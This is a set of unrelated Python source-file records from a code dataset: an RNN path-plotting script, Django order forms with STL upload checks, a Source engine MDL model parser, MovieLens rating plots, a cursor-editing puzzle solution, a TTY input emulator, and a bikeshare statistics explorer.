expand_tree(Node(\"h=\"+str(x),parent=root,children=None,value=x,time_step=root.time_step + 1))\r\n return\r\n\r\nexpand_tree(start)\r\n\r\npaths = []\r\na = list(start.leaves)\r\nfor node in a:\r\n path = []\r\n for i in node.iter_path_reverse():\r\n path.append(i.value)\r\n paths.append(path[::-1])\r\n \r\nfor i in range(len(paths)):\r\n plt.plot(paths[i],linewidth=0.5)\r\n\r\nh_0 = 0.0\r\nh_end = []\r\ntrajectories_with_inputs = []\r\nfor path in paths:\r\n output = [h_0]\r\n for p in path:\r\n output.append(fwd_equation(output[-1],p,RNN_weights))\r\n trajectories_with_inputs.append(output)\r\n h_end.append(output[-1])\r\n\r\n\r\n\r\nT = 100\r\ntrajectories_blank_input = [list(h_end)]\r\nfor k in range(T):\r\n trajectories_blank_input.append(list(fwd_equation(trajectories_blank_input[-1],BLANK_INPUT,RNN_weights)))\r\nh_end_forward= np.array(trajectories_blank_input[-1])\r\nh_start_backward = np.array([path[1] for path in paths])\r\n\r\nerror = h_start_backward - fwd_equation(h_end_forward,SIGNAL_INPUT,RNN_weights)\r\n\r\nplot_traj(paths)\r\nplt.plot(np.sort(error))\r\nplt.show()\r\nERROR_MARGIN = 1\r\ngood_error_indices = (np.argwhere((error > -ERROR_MARGIN) & (error < ERROR_MARGIN)).T).tolist()[0]\r\nfeasible_paths = [paths[i] for i in 
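# keep the paths whose backward-solved inputs a forward pass\r\n                  # reproduces to within ERROR_MARGIN\r\n                  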
good_error_indices]\r\nplot_traj(feasible_paths)\r\nplot_traj(trajectories_with_inputs)\r\n\"\"\"\r\nplot_traj(paths)\r\n\r\nplot_traj([trajectories_with_inputs[i] for i in range(1,19683,1)])\r\n\r\nplot_traj(trajectories_blank_input[1:80], False)\r\n\"\"\"\r\nprint(list([1,2]).append(RNN_weights))\r\na = [1,2] + [3,4,5]\r\n","sub_path":"Branch.py","file_name":"Branch.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"461834176","text":"# -*- coding: cp1250 -*-\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .models import UserProfile, Klient, Zamowienie, Cennik\nfrom django import forms\nimport os\n\nclass KlientForm(forms.Form):\n nazwa = forms.CharField(label='Nazwa', max_length=100)\n ulica = forms.CharField(label='Ulica',max_length=200)\n miasto = forms.CharField(label='Miasto',max_length=100)\n kod_pocztowy = forms.CharField(label='Kod pocztowy',max_length=10)\n kraj = forms.CharField(label='Kraj',max_length=40) \n nip = forms.CharField(label='NIP', max_length=13)\n uwagi = forms.CharField(widget=forms.Textarea)\n \n \nclass UploadFileForm(forms.Form): \n title = forms.CharField(max_length=40)\n file = forms.FileField()\n \nclass ZamowienieFileForm(forms.Form): \n klient = forms.ModelChoiceField(queryset=Klient.objects.all())\n przedmiot = forms.CharField(max_length=300)\n #cena = forms.DecimalField()\n #zdj = forms.FileField()\n wykonawca = forms.ModelChoiceField(queryset=User.objects.all())\n uwagi = forms.CharField(widget=forms.Textarea)\n \n \n# def clean_zdj(self):\n# zdj = self.cleaned_data.get('zdj',False)\n# print(zdj)\n# print(zdj._get_name())\n# exten=os.path.splitext(zdj._get_name())[1]\n# print(exten)\n# valid_extensions = ['.stl', ]\n# if not exten in valid_extensions:\n# raise forms.ValidationError(u'Nieprawid‚owy format pliku.')\n# if zdj:\n# if zdj._size > 15*1024*1024:\n# raise forms.ValidationError(\"plik za duzy\")\n# return zdj\n# else:\n# raise forms.ValidationError(\"Couldn't read uploaded image\")\n\nclass ZamowienieUwagiForm(forms.Form):\n uwagi = forms.CharField(label=\"\", widget=forms.Textarea(attrs={'class': 'myfieldclass'}))\n \n \nclass DodajUslugeFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n plik_uslugi = forms.FileField()\n rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n\n def clean_plik_uslugi(self):\n plik_uslugi = self.cleaned_data.get('plik_uslugi',False)\n print(plik_uslugi)\n print(plik_uslugi._get_name())\n exten=os.path.splitext(plik_uslugi._get_name())[1]\n print(exten)\n valid_extensions = ['.stl', ]\n if not exten in valid_extensions:\n raise forms.ValidationError('Nieprawidlowy format pliku.')\n if plik_uslugi:\n if plik_uslugi._size > 15*1024*1024:\n raise forms.ValidationError(\"plik za duzy\")\n return plik_uslugi\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image\") \n \nclass DodajUslugeProjektowanieFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n #plik_uslugi = forms.FileField()\n #rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n opis = forms.CharField(max_length=100)\n cena = forms.DecimalField()\n \nclass DodajUslugeFDMFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n plik_uslugi = forms.FileField()\n #rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n #material = forms.ChoiceField(choices=[('mat1','material1'),('mat2','material2')])\n material = 
forms.ModelChoiceField(queryset=Cennik.objects.filter(technologia='FDM'))\n \n def clean_plik_uslugi(self):\n plik_uslugi = self.cleaned_data.get('plik_uslugi',False)\n exten=os.path.splitext(plik_uslugi._get_name())[1]\n valid_extensions = ['.stl', ]\n if not exten in valid_extensions:\n raise forms.ValidationError('Nieprawidlowy format pliku.')\n if plik_uslugi:\n if plik_uslugi._size > 15*1024*1024:\n raise forms.ValidationError(\"plik za duzy\")\n return plik_uslugi\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image\") \n \nclass DodajUslugeSLSFileForm(forms.Form): \n \n nazwa = forms.CharField(max_length=100)\n plik_uslugi = forms.FileField()\n #rodzaj_uslugi = forms.ChoiceField(choices=[('stl','stl'),('abs','abs')])\n material = forms.ModelChoiceField(queryset=Cennik.objects.filter(technologia='SLS'))\n\n def clean_plik_uslugi(self):\n plik_uslugi = self.cleaned_data.get('plik_uslugi',False)\n exten=os.path.splitext(plik_uslugi._get_name())[1]\n valid_extensions = ['.stl', ]\n if not exten in valid_extensions:\n raise forms.ValidationError('Nieprawidlowy format pliku.')\n if plik_uslugi:\n if plik_uslugi._size > 15*1024*1024:\n raise forms.ValidationError(\"plik za duzy\")\n return plik_uslugi\n else:\n raise forms.ValidationError(\"Couldn't read uploaded image\") \n \nclass DodajMaterialForm(forms.Form):\n nazwa = forms.CharField(max_length=100)\n TECHNOLOGY = [\n ('FDM', 'FDM'),\n ('SLS', 'SLS')\n ]\n technologia = forms.ChoiceField(choices=TECHNOLOGY)\n cena = forms.DecimalField(label='Cena za cm2')\n \nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput())\n\n class Meta:\n model = User\n fields = ('username', 'email', 'password')\n \nclass UserProfileForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('data_zatrudnienia', 'pensja')\n \n \nclass EdytujUslugeForm(forms.Form):\n nazwa = forms.CharField(max_length=100)\n cena = forms.DecimalField()\n ","sub_path":"zamowienia/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"164611244","text":"import math\nimport traceback\nfrom typing import List\n\nimport numpy as np\n\nfrom ....utilities.byte_io_mdl import ByteIO\nfrom ....source_shared.base import Base\n\nfrom .flex_expressions import *\nfrom ..structs.header import MdlHeaderV49\nfrom ..structs.bone import BoneV49\nfrom ..structs.material import MaterialV49\nfrom ..structs.flex import FlexController, FlexRule, FlexControllerUI, FlexOpType\nfrom ..structs.anim_desc import AnimDesc\nfrom ..structs.sequence import Sequence\nfrom ..structs.attachment import AttachmentV49\nfrom ..structs.bodygroup import BodyPartV49\n\n\nclass _AnimBlocks:\n def __init__(self):\n self.name = ''\n self.blocks = []\n\n\nclass Mdl(Base):\n\n def __init__(self, filepath):\n self.store_value(\"MDL\", self)\n self.reader = ByteIO(filepath)\n self.header = MdlHeaderV49()\n self.bones: List[BoneV49] = []\n self.skin_groups: List[List[str]] = []\n self.materials: List[MaterialV49] = []\n self.materials_paths = []\n\n self.flex_names: List[str] = []\n self.flex_controllers = [] # type:List[FlexController]\n self.flex_ui_controllers = [] # type:List[FlexControllerUI]\n self.flex_rules = [] # type:List[FlexRule]\n\n self.body_parts = [] # type:List[BodyPartV49]\n\n self.attachments = [] # type:List[AttachmentV49]\n self.anim_descs = [] # type:List[AnimDesc]\n self.sequences = [] # type:List[Sequence]\n 
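The forms.py record above repeats the same .stl-extension and 15 MB checks in three separate clean_plik_uslugi methods. A sketch of factoring them into one reusable validator; validate_stl and UslugaForm are hypothetical names, and this uses the public upload.name/upload.size attributes rather than the private _get_name()/_size calls in the record. For the extension half alone, Django also ships django.core.validators.FileExtensionValidator.

import os
from django import forms

def validate_stl(upload, max_bytes=15 * 1024 * 1024):
    # Reject anything that is not a .stl file (case-insensitive).
    if os.path.splitext(upload.name)[1].lower() != '.stl':
        raise forms.ValidationError('Nieprawidlowy format pliku.')
    # Reject uploads over the 15 MB cap used throughout the record.
    if upload.size > max_bytes:
        raise forms.ValidationError('plik za duzy')

class UslugaForm(forms.Form):
    nazwa = forms.CharField(max_length=100)
    plik_uslugi = forms.FileField(validators=[validate_stl])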
self.anim_block = _AnimBlocks()\n\n self.bone_table_by_name = []\n self.eyeballs = []\n\n @staticmethod\n def calculate_crc(buffer):\n correct_buffer_size = math.ceil(len(buffer) / 4) * 4\n buffer += b'\\x00' * (correct_buffer_size - len(buffer))\n\n buffer: np.ndarray = np.frombuffer(buffer, np.uint32).copy()\n\n orig_checksum = buffer[2]\n buffer[8 // 4] = 0\n buffer[76 // 4] = 0\n buffer[1432 // 4:1432 // 4 + 2] = 0\n buffer[1520 // 4:(1520 + 36) // 4] = 0\n buffer[1604 // 4] = 0\n with open('shit.bin', 'wb') as f:\n f.write(buffer.tobytes())\n\n new_checksum = 0\n for i in range(buffer.shape[0]):\n tmp = buffer[i] + (new_checksum >> 27 & 1)\n\n new_checksum = (tmp & 0xFFFFFFFF) + ((2 * new_checksum) & 0xFFFFFFFF)\n new_checksum &= 0xFFFFFFFF\n print(f'{i * 4 + 4}: {new_checksum:08x} : {new_checksum}')\n buffer[2] = new_checksum\n print(orig_checksum, new_checksum)\n\n def read(self):\n header = self.header\n reader = self.reader\n header.read(reader)\n\n reader.seek(header.bone_offset)\n for bone_id in range(header.bone_count):\n bone = BoneV49(bone_id)\n bone.read(reader)\n self.bones.append(bone)\n\n reader.seek(header.texture_offset)\n for _ in range(header.texture_count):\n texture = MaterialV49()\n texture.read(reader)\n self.materials.append(texture)\n\n reader.seek(header.texture_path_offset)\n for _ in range(header.texture_path_count):\n self.materials_paths.append(reader.read_source1_string(0))\n\n reader.seek(header.skin_family_offset)\n for _ in range(header.skin_family_count):\n skin_group = []\n for _ in range(header.skin_reference_count):\n texture_index = reader.read_uint16()\n skin_group.append(self.materials[texture_index].name)\n self.skin_groups.append(skin_group)\n\n diff_start = 0\n for skin_info in self.skin_groups[1:]:\n for n, (a, b) in enumerate(zip(self.skin_groups[0], skin_info)):\n if a == b:\n diff_start = max(n, diff_start)\n break\n\n for n, skin_info in enumerate(self.skin_groups):\n self.skin_groups[n] = skin_info[:diff_start]\n\n reader.seek(header.flex_desc_offset)\n for _ in range(header.flex_desc_count):\n self.flex_names.append(reader.read_source1_string(reader.tell()))\n\n reader.seek(header.flex_controller_offset)\n for _ in range(header.flex_controller_count):\n controller = FlexController()\n controller.read(reader)\n self.flex_controllers.append(controller)\n\n reader.seek(header.flex_rule_offset)\n for _ in range(header.flex_rule_count):\n rule = FlexRule()\n rule.read(reader)\n self.flex_rules.append(rule)\n\n reader.seek(header.local_attachment_offset)\n for _ in range(header.local_attachment_count):\n attachment = AttachmentV49()\n attachment.read(reader)\n self.attachments.append(attachment)\n\n reader.seek(header.flex_controller_ui_offset)\n for _ in range(header.flex_controller_ui_count):\n flex_controller = FlexControllerUI()\n flex_controller.read(reader)\n self.flex_ui_controllers.append(flex_controller)\n\n reader.seek(header.body_part_offset)\n for _ in range(header.body_part_count):\n body_part = BodyPartV49()\n body_part.read(reader)\n self.body_parts.append(body_part)\n\n reader.seek(header.local_animation_offset)\n for _ in range(header.local_animation_count):\n anim_desc = AnimDesc()\n anim_desc.read(reader)\n self.anim_descs.append(anim_desc)\n\n reader.seek(header.local_sequence_offset)\n for _ in range(header.local_sequence_count):\n seq = Sequence()\n seq.read(reader)\n self.sequences.append(seq)\n\n self.anim_block.name = reader.read_from_offset(header.anim_block_name_offset, reader.read_ascii_string)\n 
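The mdl_file.py record being read here keeps repeating one parsing pattern: seek to an offset taken from the header, then read a fixed count of records. A generic, runnable sketch of that table-of-contents style with the standard struct module (read_table and the '<i' record layout are illustrative assumptions, not the actual MDL format):

import struct
from io import BytesIO

def read_table(buf, offset, count, fmt):
    # Jump to the table, then unpack `count` fixed-size records.
    buf.seek(offset)
    size = struct.calcsize(fmt)
    return [struct.unpack(fmt, buf.read(size)) for _ in range(count)]

blob = BytesIO(struct.pack('<3i', 10, 20, 30))  # fake file: three int32 records
print(read_table(blob, 0, 3, '<i'))             # [(10,), (20,), (30,)]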
self.reader.seek(self.header.anim_block_offset)\n for _ in range(self.header.anim_block_count):\n self.anim_block.blocks.append(self.reader.read_fmt('2i'))\n\n if self.header.bone_table_by_name_offset and self.bones:\n self.reader.seek(self.header.bone_table_by_name_offset)\n self.bone_table_by_name = [self.reader.read_uint8() for _ in range(len(self.bones))]\n\n # for anim\n\n def rebuild_flex_rules(self):\n rules = {}\n\n for rule in self.flex_rules:\n stack = []\n try:\n for op in rule.flex_ops:\n flex_op = op.op\n if flex_op == FlexOpType.CONST:\n stack.append(Value(op.value))\n elif flex_op == FlexOpType.FETCH1:\n stack.append(FetchController(self.flex_controllers[op.index].name))\n elif flex_op == FlexOpType.FETCH2:\n stack.append(FetchFlex(self.flex_names[op.index]))\n elif flex_op == FlexOpType.ADD:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Add(left, right))\n elif flex_op == FlexOpType.SUB:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Sub(left, right))\n elif flex_op == FlexOpType.MUL:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Mul(left, right))\n elif flex_op == FlexOpType.DIV:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Div(left, right))\n elif flex_op == FlexOpType.NEG:\n stack.append(Neg(stack.pop(-1)))\n elif flex_op == FlexOpType.MAX:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Max(left, right))\n elif flex_op == FlexOpType.MIN:\n right = stack.pop(-1)\n left = stack.pop(-1)\n stack.append(Min(left, right))\n elif flex_op == FlexOpType.COMBO:\n count = op.index\n values = [stack.pop(-1) for _ in range(count)]\n combo = Combo(*values)\n stack.append(combo)\n elif flex_op == FlexOpType.DOMINATE:\n count = op.index + 1\n values = [stack.pop(-1) for _ in range(count)]\n dom = Dominator(*values)\n stack.append(dom)\n elif flex_op == FlexOpType.TWO_WAY_0:\n mx = Max(Add(FetchController(self.flex_controllers[op.index].name), Value(1.0)), Value(0.0))\n mn = Min(mx, Value(1.0))\n res = Sub(1, mn)\n stack.append(res)\n elif flex_op == FlexOpType.TWO_WAY_1:\n mx = Max(FetchController(self.flex_controllers[op.index].name), Value(0.0))\n mn = Min(mx, Value(1.0))\n stack.append(mn)\n elif flex_op == FlexOpType.NWAY:\n flex_cnt_value = int(stack.pop(-1).value)\n flex_cnt = FetchController(self.flex_controllers[flex_cnt_value].name)\n f_w = stack.pop(-1)\n f_z = stack.pop(-1)\n f_y = stack.pop(-1)\n f_x = stack.pop(-1)\n gtx = Min(Value(1.0), Neg(Min(Value(0.0), Sub(f_x, flex_cnt))))\n lty = Min(Value(1.0), Neg(Min(Value(0.0), Sub(flex_cnt, f_y))))\n remap_x = Min(Max(Div(Sub(flex_cnt, f_x), (Sub(f_y, f_x))), Value(0.0)), Value(1.0))\n gtey = Neg(Sub(Min(Value(1.0), Neg(Min(Value(0.0), Sub(flex_cnt, f_y)))), Value(1.0)))\n ltez = Neg(Sub(Min(Value(1.0), Neg(Min(Value(0.0), Sub(f_z, flex_cnt)))), Value(1.0)))\n gtz = Min(Value(1.0), Neg(Min(Value(0.0), Sub(f_z, flex_cnt))))\n ltw = Min(Value(1.0), Neg(Min(Value(0.0), Sub(flex_cnt, f_w))))\n remap_z = Sub(Value(1.0),\n Min(Max(Div(Sub(flex_cnt, f_z), (Sub(f_w, f_z))), Value(0.0)), Value(1.0)))\n final_expr = Add(Add(Mul(Mul(gtx, lty), remap_x), Mul(gtey, ltez)), Mul(Mul(gtz, ltw), remap_z))\n\n final_expr = Mul(final_expr, FetchController(self.flex_controllers[op.index].name))\n stack.append(final_expr)\n elif flex_op == FlexOpType.DME_UPPER_EYELID:\n stack.pop(-1)\n stack.pop(-1)\n stack.pop(-1)\n stack.append(Value(1.0))\n elif flex_op == FlexOpType.DME_LOWER_EYELID:\n stack.pop(-1)\n stack.pop(-1)\n stack.pop(-1)\n stack.append(Value(1.0))\n else:\n 
print(\"Unknown OP\", op)\n if len(stack) > 1 or not stack:\n print(f\"failed to parse ({self.flex_names[rule.flex_index]}) flex rule\")\n print(stack)\n continue\n final_expr = stack.pop(-1)\n # name = self.get_value('stereo_flexes').get(rule.flex_index, self.flex_names[rule.flex_index])\n name = self.flex_names[rule.flex_index]\n rules[name] = final_expr\n except Exception as ex:\n traceback.print_exc()\n print(f\"failed to parse ({self.flex_names[rule.flex_index]}) flex rule\")\n print(stack)\n\n return rules\n","sub_path":"source1/mdl/v49/mdl_file.py","file_name":"mdl_file.py","file_ext":"py","file_size_in_byte":11828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299494198","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nratings = pd.read_csv('./ml-latest-small/ratings.csv')\n\nprint('Media: ', ratings.rating.mean())\nprint('Mediana: ', ratings.rating.median())\nprint('Frequencia:\\n', ratings.rating.value_counts())\n\nplt.title('Historiograma da frequencia das notas:')\nratings.rating.plot(kind='hist')\nplt.show()\n\nplt.title('Boxplot da frequencia das notas:')\n# plt.figure(figsize=(5, 5))\nsns.boxplot(ratings.rating)\nplt.show()\n\nmovies = pd.read_csv('./ml-latest-small/movies.csv')\n\nratings_per_movie = ratings.groupby('movieId').mean().rating\n\nplt.title('Historiograma da media das notas por filme:')\nratings_per_movie.plot(kind='hist')\nplt.show()\n\nplt.title('Boxplot da media das notas por filme:')\nsns.boxplot(ratings_per_movie)\nplt.show()\n\nplt.title('Historiograma da media das notas por filme usando Seaborn:')\nsns.distplot(ratings_per_movie, bins=10) # bins configura a quantidade de colunas que aparecem\nplt.show()\n","sub_path":"introducao_graficos.py","file_name":"introducao_graficos.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"321741990","text":"# https://www.acmicpc.net/problem/5397\n\nfrom sys import stdin\n# import queue\nfor _ in range(int(stdin.readline())):\n testCase = stdin.readline().strip()\n output = []\n # temp = queue.Queue()\n temp = []\n for char in testCase :\n if char == \"<\":\n if len(output) :\n # temp.put(output.pop())\n temp.append(output.pop())\n elif char == \">\":\n # if temp.qsize() != 0 :\n if len(temp) :\n output.append(temp.pop())\n elif char == \"-\":\n if len(output):\n output.pop()\n else :\n output.append(char)\n # while temp.qsize() != 0 :\n # output.append(temp.get())\n while len(temp) :\n output.append(temp.pop())\n print(''.join(output))","sub_path":"dojinyou/code_1week/07_5397.py","file_name":"07_5397.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645463875","text":"\"\"\"\nEmulate the Input TTY device (TTYIN).\n\"\"\"\n\nfrom Globals import *\n\nimport log\nlog = log.Log('test.log', log.Log.DEBUG)\n\n\nclass TtyIn(object):\n\n # define various internal states\n DEVICE_NOT_READY = 0\n DEVICE_READY = 1\n TTYIN_CHARS_PER_SECOND = 1000\n# DEVICE_READY_CYCLES = int(CYCLES_PER_SECOND / TTYIN_CHARS_PER_SECOND)\n DEVICE_READY_CYCLES = 200\n\n\n def __init__(self):\n \"\"\"Initialize the TTYIN device.\"\"\"\n\n self.filename = None\n self.open_file = None\n self.value = 0xff\n self.atEOF = True\n self.cycle_count = 0\n self.status = self.DEVICE_NOT_READY\n self.offset = 0\n\n def mount(self, fname):\n \"\"\"Mount a file on the TTYIN 
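A note on the BOJ 5397 editor record above: it models the cursor with two stacks, the characters to the left of the cursor and (reversed) the characters to its right, so every keystroke is O(1); the commented-out queue.Queue attempts in that record hint at why a queue is the wrong fit, since all edits happen at the cursor, i.e. at the stack tops. A compact sketch (edit is a hypothetical name):

def edit(commands):
    left, right = [], []  # text left of the cursor / reversed text right of it
    for ch in commands:
        if ch == '<':
            if left: right.append(left.pop())   # move cursor left
        elif ch == '>':
            if right: left.append(right.pop())  # move cursor right
        elif ch == '-':
            if left: left.pop()                 # backspace
        else:
            left.append(ch)                     # insert at the cursor
    return ''.join(left) + ''.join(reversed(right))

print(edit('<<BP<A>>Cd-'))  # BAPC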
device.\"\"\"\n\n# log(\"Mounting '%s' on TTYIN\" % fname)\n\n self.filename = fname\n self.open_file = open(fname, 'r')\n self.value = self.open_file.read(1)\n self.atEOF = False\n self.cycle_count = self.DEVICE_READY_CYCLES\n self.status = self.DEVICE_NOT_READY\n if len(self.value) < 1:\n # EOF on input file\n self.atEOF = True\n self.cycle_count = 0\n else:\n self.value = ord(self.value)\n self.offset = 0\n\n def dismount(self):\n \"\"\"Dismount the file on the TTYIN device.\"\"\"\n\n# log(\"Dismounting '%s' on TTYIN\" % self.filename)\n\n if self.open_file:\n self.open_file.close()\n self.filename = None\n self.open_file = None\n self.value = 0\n self.atEOF = True\n self.status = self.DEVICE_NOT_READY\n self.offset = 0\n\n def read(self):\n \"\"\"Return the current device value.\"\"\"\n\n# log(\"Reading TTYIN: returning %03o\" % self.value)\n\n return self.value\n\n def ready(self):\n \"\"\"Return device status.\"\"\"\n\n return (self.status == self.DEVICE_READY)\n\n def clear(self):\n \"\"\"Clear the device 'ready' status.\"\"\"\n\n# log(\"TTYIN: clearing flag\")\n\n self.status = self.DEVICE_NOT_READY\n\n def tick(self, cycles):\n \"\"\"Advance the device state by 'cycles' number of CPU cycles.\"\"\"\n\n if not self.atEOF:\n self.cycle_count -= cycles\n if self.cycle_count <= 0:\n self.cycle_count += self.DEVICE_READY_CYCLES\n self.status = self.DEVICE_READY\n self.value = self.open_file.read(1)\n self.offset += 1\n if len(self.value) < 1:\n # EOF on input file\n self.atEOF = True\n self.value = chr(0xff)\n self.cycle_count = 0\n self.status = self.DEVICE_NOT_READY\n self.value = ord(self.value)\n","sub_path":"pymlac/TtyIn.py","file_name":"TtyIn.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350534869","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[43]:\n\n\nimport time\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\n\n# In[44]:\n\n\n#### whether you enter uppercase or lower case the function will output lowercase\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n # get user input for month (all, january, february, ... , june)\n # get user input for day of week (all, monday, tuesday, ... sunday)\n \n print('Hello! Let\\'s explore some US bikeshare data! It will be lots of fun!')\n \n month_dict = {\n 'january' : 1,\n 'february' : 2,\n 'march' : 3,\n 'april' : 4,\n 'may' : 5,\n 'june' : 6,\n 'all' : 'all',\n }\n \n day_dict = {\n 'monday' : 0,\n 'tuesday' : 1,\n 'wednesday' : 2,\n 'thursday' : 3,\n 'friday' : 4,\n 'saturday' : 5,\n 'sunday' : 6,\n 'all' : 'all'\n }\n \n \n while True:\n global city\n valid_cities = ['chicago', 'washington', 'new york city']\n city = input(\"Which city would you like to explore? Chicago, New York City, and Washington are your only options! \").lower()\n if city not in valid_cities:\n print('Dude/dudette come on, enter one of the cities in the list. 
Spelling actually matters.')\n continue\n else:\n break\n \n while True:\n global month\n valid_month = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n month_name = input(\"Which month would you like to explore? You can enter all, or a specific month from January to June \").lower()\n if month_name not in valid_month:\n print('Seriously? - Stop being stupid and enter a real month. Like I told you, spelling actually matters.')\n continue\n else:\n month = month_dict[month_name]\n break\n \n while True:\n global day\n valid_day = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']\n upper_day = [day.title() for day in valid_day]\n valid_day += upper_day\n day_name = input(\"Which day would you like to explore? You can enter all, or a specific day: Monday, Tuesday. . .etc \").lower()\n if day_name not in valid_day:\n print('Ok this is the last time I tell you to put in valid input. Put in an actual day.')\n continue\n else:\n day = day_dict[day_name]\n break\n \n \n print('-'*40)\n return city, month, day\n\n\n# In[45]:\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n global df\n\n df = pd.read_csv(CITY_DATA[city])\n df['month_index'] = pd.DatetimeIndex(df['Start Time']).month\n df['weekday_index'] = pd.DatetimeIndex(df['Start Time']).weekday\n\n if month == 'all':\n if day == 'all':\n return df\n else:\n df = df.loc[df['weekday_index'] == day]\n return df\n else:\n if day == 'all':\n df = df.loc[df['month_index'] == month]\n return df\n else:\n df = df.loc[(df['month_index'] == month) & (df['weekday_index'] == day)]\n return df\n \n return df\n\n\n# In[46]:\n\n\ndef time_stats(df):\n \"\"\"Displays summary statistics on the most frequent times of travel.\"\"\"\n \n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n month_dict = { 1 : 'january', 2 : 'february', 3 : 'march',\n 4 : 'april', 5 : 'may', 6 : 'june', }\n\n print('The most common month to travel was {}.'.format(month_dict[(np.bincount(df['month_index']).argmax())]))\n\n # display the most common day of week\n day_dict = day_dict = { 0 : 'monday', 1 : 'tuesday', 2 : 'wednesday',\n 3 : 'thursday', 4 : 'friday', 5 : 'saturday', 6 : 'sunday' }\n\n print('The most common day to travel was {}.'.format(day_dict[(np.bincount(df['weekday_index']).argmax())]))\n\n # display the most common start hour\n hour_dict = { 1 : '1AM', 2 : '2AM', 3 : '3AM', 4 : '4AM', 5 : '5AM', 6 : '6AM', \n 7 : '7AM', 8 : '8AM', 9 : '9AM', 10 : '10AM', 11 : '11AM',\n 12 : '12PM', 13 : '1PM', 14 : '2PM', 15 : '3PM', 16 : '4PM',\n 17 : '5PM', 18 : '6PM', 19 : '7PM', 20 : '8PM', 21 : '9PM',\n 22 : '10PM', 23 : '11PM', 24 : '12AM' }\n\n print('The most common hour to start a trip was to travel was {}.' 
.format(hour_dict[(np.bincount(pd.DatetimeIndex(df['Start Time']).hour).argmax())]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[47]:\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n \n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print('The most common start station is {}.'.format(df['Start Station'].value_counts().idxmax()))\n\n # display most commonly used end station\n print('The most common end station is {}.'.format(df['End Station'].value_counts().idxmax()))\n\n\n # display most frequent combination of start station and end station trip\n print('The most common start/end pair of stations is: {}'.format(df.groupby(['Start Station', 'End Station']) .size().sort_values(ascending=False).idxmax()))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[48]:\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n print('Total travel time for travellers in {} was {} hours'.format(city.title(), sum(df['Trip Duration']/60)))\n\n\n # display mean travel time\n print('Mean travel time for travellers in {} was {} minutes'.format(city.title(), ((df['Trip Duration']).mean()/60)))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\n# In[49]:\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n if len(df) == 0:\n print('There were no riders in {} during your selected time frame.'.format(city.title()))\n \n else:\n \n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print('There were {} subscribers and {} customers in {}.' .format(df['User Type'].value_counts()['Subscriber'], df['User Type'].value_counts()['Customer'], city.title()))\n\n # Display counts of gender\n if city == 'washington':\n print('Unfortunately we don\\'t have any gender data for {}, so we won\\'t be able to display user stats.' .format(city.title()))\n \n else:\n print('There were {} male users and {} female users in {}' .format(len(df[df['Gender'] 